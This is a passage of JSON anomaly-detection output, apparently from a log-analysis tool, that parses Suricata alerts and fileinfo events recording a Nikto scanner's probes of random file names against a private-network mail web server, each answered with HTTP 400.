non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46878 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.phpp", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.265852+0000\",\"flow_id\":1618846172187243,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.phpp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.phpp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.265852, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1618846172187243,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 
"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.phpp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.phpp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.phpp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.phpp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.phpp\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": 
",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.phpp\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.phpp", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.phpp", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", 
"/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46878, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1618846172187243,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1618846172187243, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.265852+0000\",\"flow_id\":1618846172187243,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46878,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.phpp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.phpp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.268069 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46880 -> 192.168.10.154:80", "/parser/model/time": 1583349514.268069, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 
3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46880, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.268069 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46880 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nsconfig", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.268291+0000\",\"flow_id\":127685066625492,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsconfig\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsconfig\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.268291, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", 
"/parser/model/flow_id": "\"flow_id\":127685066625492,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsconfig\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsconfig\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsconfig\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsconfig\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nsconfig\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", 
"/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nsconfig\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nsconfig", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nsconfig", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46880, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":127685066625492,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 127685066625492, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.268291+0000\",\"flow_id\":127685066625492,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46880,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsconfig\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsconfig\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.270141 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46882 -> 192.168.10.154:80", "/parser/model/time": 1583349514.270141, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol 
Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46882, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.270141 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46882 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.axd", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.270360+0000\",\"flow_id\":531532251536341,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.axd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.axd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.27036, "/parser/model/plus_sign": 
"+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":531532251536341,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.axd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.axd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.axd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.axd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.axd\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.axd\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.axd", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.axd", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 
226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46882,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46882, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":531532251536341,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 531532251536341, 
